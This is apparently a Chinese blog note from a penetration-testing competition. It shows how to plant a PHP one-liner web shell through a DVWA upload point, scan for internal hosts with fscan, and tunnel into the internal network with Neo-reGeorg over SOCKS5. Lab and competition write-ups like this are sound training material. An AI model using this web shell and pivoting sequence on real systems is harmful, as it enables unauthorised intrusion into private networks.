工具:Neo-reGeorg
这段时间打了一个渗透赛,也是通过这次机会向独奏师傅学习到了好多东西
在这里先简单记录一下
首先内网代理搭建就是为了让内网能够被自己的机子正常访问服务
这里附上一副图,cms-phpok 便是代表的使外网的机子,而后面的 solr 代表的便是内网的机子,在外网没有 getshell,没有搭建代理,是无法正常访问内网的机子的,因此在这里记录一下 getshell 之后搭建内网代理的过程
首先先拿到一台有 web 服务的服务器,这里简单一些就直接拿一台部署过 dvwa 靶场的服务器来做示例了
首先先正常登录,找到上传点,上传一句话木马
1 | <?= @eval($_POST{'a'});?> |
使用蚁剑 getshell
然后我们能在根目录看到有个 tmp 目录,有个小 tips 就是可以在这里上传扫描工具,比如 fscan 什么的,就能实现在它的机子上扫描内网 ip 了
我这里上传了一个 fscan 作为示例,内网地址的话本次的比赛是给了,但是也可以自己找,一种方法就是在虚拟终端 ip
addr 查看
还有一种方法以这台机子为例
进入根目录下发现使用 docker 搭建的,那么直接 cat
/etc/hosts,也能够找到内网的 ip
这里就不展示了,接下来讲述内网代理的搭建工具 Neo-reGeorg
首先在原先上传马的目录先上传工具 Neo-reGeorg\neoreg_servers 目录下的 tunnel.php,接着打开自己的终端运行 python 工具脚本
1 | python3 neoreg.py -k key -u ip/目录/tunnel.php |
-k 代表的是 key,可以去 Neo-reGeorg\neoreg_servers 目录下的 key.txt 查看
接着在自己的浏览器使用 SwitchyOmega 使用 SOCKS5 协议
点击应用即可,再在浏览器右上角将代理切换至刚才配置好的自己设置的名称,就会发现自己的 ip 已经切换至目标机子的服务器,就能够正常访问内网了
